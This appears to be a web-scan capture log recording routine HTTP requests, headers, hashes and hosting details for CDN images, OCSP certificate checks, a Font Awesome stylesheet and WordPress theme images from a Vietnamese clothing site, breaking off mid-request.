x-amzn-requestid: 3d58ffea-3433-4c5c-a60b-17f6de3a33e5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cSsnvG44oAMFfyQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638427ca-63b375f04189b7ce7d84cd5d;Sampled=0
x-amzn-remapped-date: Mon, 28 Nov 2022 03:15:22 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: -AurmlKwF0QgfsWBsV3ZN9ZyDhw1Zo82zUqrpkBbvbCfh0j7evV2Tg==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 fda3b2797d2719576f6b916583a28e52.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 11:01:04 GMT
age: 14606
etag: "65c8b4abf957f9b54d99d0f78559e639adb29efb"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd7dc00fa-a8d3-44bf-ba84-1998d8dd7c5a.jpeg
34.120.237.76200 OK 4.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd7dc00fa-a8d3-44bf-ba84-1998d8dd7c5a.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash fcb89ca25035b2bbb71ae5dd175fcd40
544428cdad754b1bb7be3cd46a79bf078fd5b450
36dcbbe6cd2710ee502776b4bcf32053e92b750a55e2bd4cdeadbc694c7c2699
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fd7dc00fa-a8d3-44bf-ba84-1998d8dd7c5a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 4309
x-amzn-requestid: c824c317-e6e3-4006-9f9d-ea54e8170a4c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cf2_tGErIAMF8_A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63896b97-7fc523296afea4dd4b5d1de8;Sampled=0
x-amzn-remapped-date: Fri, 02 Dec 2022 03:05:59 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: bd85z5A6C0nxpDjeSEPp1NHJxXFO5sy1OgTLz7KpdWz61TNrfyQ47Q==
via: 1.1 40b967aa4aa18637c4b91214147f3cb4.cloudfront.net (CloudFront), 1.1 6172bb1a5d00a3b06ae3700570ebe116.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 03:53:20 GMT
age: 40270
etag: "544428cdad754b1bb7be3cd46a79bf078fd5b450"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F683f066f-699d-4765-8f4f-33c72e1672e2.jpeg
34.120.237.76200 OK 6.2 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F683f066f-699d-4765-8f4f-33c72e1672e2.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash b986f9fcbeca91ed5c8d58fbfaf47d19
6e6c8bd2bce144cc4da1cd7be375b046b60dca79
07a8938d2841f8c13bd646f4e79e41e46acd6463aa019cd70871b3741f12bb4f
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F683f066f-699d-4765-8f4f-33c72e1672e2.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 6174
x-amzn-requestid: f78f1e9d-8c0c-495d-a862-61838f8297e8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cZ0iyH2WoAMFQdg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63870144-45442a8544259930564f685b;Sampled=0
x-amzn-remapped-date: Wed, 30 Nov 2022 07:07:48 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: QIOz71_Kr08pIIwOm2GUkWr421fO7-UyUI7LYld0JBaGnYQ0j3IDFg==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 d6a002c70d55f415107618b0750d493c.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 00:57:24 GMT
age: 50826
etag: "6e6c8bd2bce144cc4da1cd7be375b046b60dca79"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F59297fb7-bcb3-48eb-83b5-7d264b21c3db.jpeg
34.120.237.76200 OK 8.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F59297fb7-bcb3-48eb-83b5-7d264b21c3db.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 436b46a2eea584bd8ec1dba5603c8659
fed437d1919af63f9d58396f318568aadae3d868
fff21dd129f35807bfc29c6582661a79e764238076e540968b57fcad18811566
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F59297fb7-bcb3-48eb-83b5-7d264b21c3db.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 8016
x-amzn-requestid: bfb5f288-4467-467a-9b30-1055a4e6bc54
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ciZPeE4nIAMFvnQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638a6f2f-53a5a66704157f4e003ecfa4;Sampled=0
x-amzn-remapped-date: Fri, 02 Dec 2022 21:33:35 GMT
x-amz-cf-pop: SEA19-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: lUqXgbpEaZh9DO_rv0K5pzHUAF1DsASkKYNTU6t5AUWZjHNV9LRojA==
via: 1.1 aabd01c4a20dae837d162bd972422efc.cloudfront.net (CloudFront), 1.1 36810aa1793ee589dc8c194860296078.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Dec 2022 22:01:05 GMT
age: 61405
etag: "fed437d1919af63f9d58396f318568aadae3d868"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b6b798b-d396-454d-9d5b-17b47827e4ad.jpeg
34.120.237.76200 OK 2.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b6b798b-d396-454d-9d5b-17b47827e4ad.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash b47431190f34eccf0a6efb98e2a32b7d
9fc7ab3a4eb2d36fd6df7e0267a26a47627d1704
08d3b6be354cafb70c20e6865788cb375adbf88d47711651fe1a3b855094daf2
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b6b798b-d396-454d-9d5b-17b47827e4ad.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 2942
x-amzn-requestid: ed26679f-cd56-477f-9914-f9afbcaaeea6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cfGeoGFYoAMFWgA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63891df7-4ec6bebe21656d5026456994;Sampled=0
x-amzn-remapped-date: Thu, 01 Dec 2022 21:34:47 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: XvG2dAUeB914GQ1qJwQRHovAtra8OSjG-CsXeR8UOBq5r8qVjEbPBQ==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 05:02:08 GMT
age: 36142
etag: "9fc7ab3a4eb2d36fd6df7e0267a26a47627d1704"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash ecab83d593cc540b02689be5be7abc8a
81cda579b7b9b22332b85266b0126585f3d3f73f
d469c5adb69f261084b016f8e24edf8b69b62d9f930ca2d85cf35375e2303ecc
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5348
Expires: Sat, 03 Dec 2022 16:33:38 GMT
Date: Sat, 03 Dec 2022 15:04:30 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash ecab83d593cc540b02689be5be7abc8a
81cda579b7b9b22332b85266b0126585f3d3f73f
d469c5adb69f261084b016f8e24edf8b69b62d9f930ca2d85cf35375e2303ecc
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5348
Expires: Sat, 03 Dec 2022 16:33:38 GMT
Date: Sat, 03 Dec 2022 15:04:30 GMT
Connection: keep-alive
uniqlonhat.com/wp-content/themes/eStore/images/addto-cart.png
103.28.36.212200 OK 830 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/addto-cart.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 273 x 46, 8-bit colormap, non-interlaced\012- data
Hash a72785f821bcd46e51507c3058ae9199
8066d7b2f0e79a63de0b4b9121fd0595d65716ee
974ebd8aca6f5fcfce0913129d800090eafe569ef98e44db03d70697c5fefe4d
GET /wp-content/themes/eStore/images/addto-cart.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/wp-content/themes/eStore/style.css
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 03:49:44 GMT
Accept-Ranges: bytes
Content-Length: 830
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash ecab83d593cc540b02689be5be7abc8a
81cda579b7b9b22332b85266b0126585f3d3f73f
d469c5adb69f261084b016f8e24edf8b69b62d9f930ca2d85cf35375e2303ecc
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5348
Expires: Sat, 03 Dec 2022 16:33:38 GMT
Date: Sat, 03 Dec 2022 15:04:30 GMT
Connection: keep-alive
uniqlonhat.com/wp-content/uploads/2016/01/page-150x150-5601_44x44.jpg
103.28.36.212200 OK 1.4 kB URL HTTP/1.1 uniqlonhat.com/wp-content/uploads/2016/01/page-150x150-5601_44x44.jpg
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 44x44, components 3\012- data
Hash d9d6955ae9ae75e90359c48aba800087
831e302df89877ce2cf690ef7f29957c28945e20
197c39c61fa02895fa53a9162237a4962a3992c58482eba5473947fc5c74ac3e
GET /wp-content/uploads/2016/01/page-150x150-5601_44x44.jpg HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/jpeg
Last-Modified: Sat, 03 Dec 2022 15:04:26 GMT
Accept-Ranges: bytes
Content-Length: 1365
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/uploads/2016/01/goods_36_151933-150x150-5011_44x44.jpg
103.28.36.212200 OK 1.2 kB URL HTTP/1.1 uniqlonhat.com/wp-content/uploads/2016/01/goods_36_151933-150x150-5011_44x44.jpg
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 44x44, components 3\012- data
Hash 9b3745d3058a70f684b16ec7321cbc06
334bb2f0f332748bddbfcd93dd3f23c65fe3f4d0
925ce326aba8b90ed6e643396328d4b6356f42e9f49c211c1c94aa9c206c31fa
GET /wp-content/uploads/2016/01/goods_36_151933-150x150-5011_44x44.jpg HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/jpeg
Last-Modified: Sat, 03 Dec 2022 15:04:26 GMT
Accept-Ranges: bytes
Content-Length: 1161
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/uploads/2016/01/goods_16_151933-150x150-4673_44x44.jpg
103.28.36.212200 OK 1.2 kB URL HTTP/1.1 uniqlonhat.com/wp-content/uploads/2016/01/goods_16_151933-150x150-4673_44x44.jpg
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 44x44, components 3\012- data
Hash e6e14e4e03d2dfac2d5c3dec32461de8
5d68c8c10ae297a2b046ad0fb5ed5e7e02dcea03
d1d85d88a345cfbd6261f0da4c4d83bbed142ac4217f8872d870e4317929430c
GET /wp-content/uploads/2016/01/goods_16_151933-150x150-4673_44x44.jpg HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/jpeg
Last-Modified: Sat, 03 Dec 2022 15:04:26 GMT
Accept-Ranges: bytes
Content-Length: 1186
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/images/header-bottom-bg.png
103.28.36.212200 OK 301 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/header-bottom-bg.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 107 x 5, 8-bit colormap, non-interlaced\012- data
Hash 4d27046f4a6056901cafe467a1766f18
8350bd6813258d16bbeefc87cb81c39ffc2ed622
60ba1f2f75611c2fe06522037bf9439be124a27cfa50cb735b71f4576b0bee36
GET /wp-content/themes/eStore/images/header-bottom-bg.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/wp-content/themes/eStore/style.css
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 03:49:45 GMT
Accept-Ranges: bytes
Content-Length: 301
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css
104.18.11.207200 OK 6.9 kB URL HTTP/2 maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css
IP 104.18.11.207:0
File type ASCII text, with very long lines (27303)
Hash e4e453612a6e0c7111b70091fa44328e
b8e2ea27c621b2a5f6c12840b62cded06933c9d3
e415c39866a98cfa848fdbc1b19976e061675cb3090422d34f911ee1fd9ec85a
GET /font-awesome/4.5.0/css/font-awesome.min.css HTTP/1.1
Host: maxcdn.bootstrapcdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Sat, 03 Dec 2022 15:04:29 GMT
content-type: text/css; charset=utf-8
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
cdn-edgestorageid: 565, 617, 617
last-modified: Mon, 25 Jan 2021 22:04:54 GMT
cdn-cachedat: 2021-06-08 19:04:20
cdn-requestpullsuccess: True
cdn-requestpullcode: 200
cache-control: public, max-age=31919000
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
x-content-type-options: nosniff
cdn-requestid: e9a84d03a1f7c6aa17012c712a6e5dd5
cdn-status: 200
cdn-cache: HIT
cf-cache-status: HIT
age: 15524117
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 773d31f13e870b4d-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
uniqlonhat.com/wp-content/themes/eStore/images/red/secondary-menu.png
103.28.36.212200 OK 5.3 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/red/secondary-menu.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 961 x 98, 8-bit/color RGBA, non-interlaced\012- data
Hash 59de38f496dc2bdce31ffb645fbfe8e8
f1048d88e1616f531e1ab46b9643bb62cf542122
e343c8d0a4b5ab66f0c2808080ffea4282d6307e8ece46d49a14f83c4e3b3438
GET /wp-content/themes/eStore/images/red/secondary-menu.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/wp-content/themes/eStore/style-Red.css
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 03:49:47 GMT
Accept-Ranges: bytes
Content-Length: 5259
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/images/breadcrumbs_separator.png
103.28.36.212200 OK 147 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/breadcrumbs_separator.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 3 x 5, 8-bit colormap, non-interlaced\012- data
Hash 2f050595df365404ca9b4f1ff4b4285c
558dd64fdd28c00cb482d4b646914d59b37ede4d
561dd493ec7345758b4c1469153892afb05c07d6d9089802f9301057f7c751f6
GET /wp-content/themes/eStore/images/breadcrumbs_separator.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/wp-content/themes/eStore/style.css
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 03:49:45 GMT
Accept-Ranges: bytes
Content-Length: 147
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/images/content-top.png
103.28.36.212200 OK 366 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/content-top.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 962 x 8, 8-bit colormap, non-interlaced\012- data
Hash 8b6fe13decea154d466cad441454f556
1d184cb1a8d35abb7816d98ac8d3caa80f37d609
463a774ef6177291d47655a47d699e44f00e0c233cb212ea649ccef1342aa1d1
GET /wp-content/themes/eStore/images/content-top.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/wp-content/themes/eStore/style.css
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:28 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 03:49:45 GMT
Accept-Ranges: bytes
Content-Length: 366
Date: Sat, 03 Dec 2022 15:04:28 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/images/main-bg.png
103.28.36.212200 OK 154 B URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/images/main-bg.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 962 x 2, 8-bit colormap, non-interlaced\012- data
Hash 7f4ca39cf6b56982ac63c5abdbd90ece
5831726cd80d0da2dd7cc46322f30d8413aa9c26
4342b57167593e8b3465699a7cd949cc36672e475f7da37a1d92f0f8ab117771
GET /wp-content/themes/eStore/images/main-bg.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
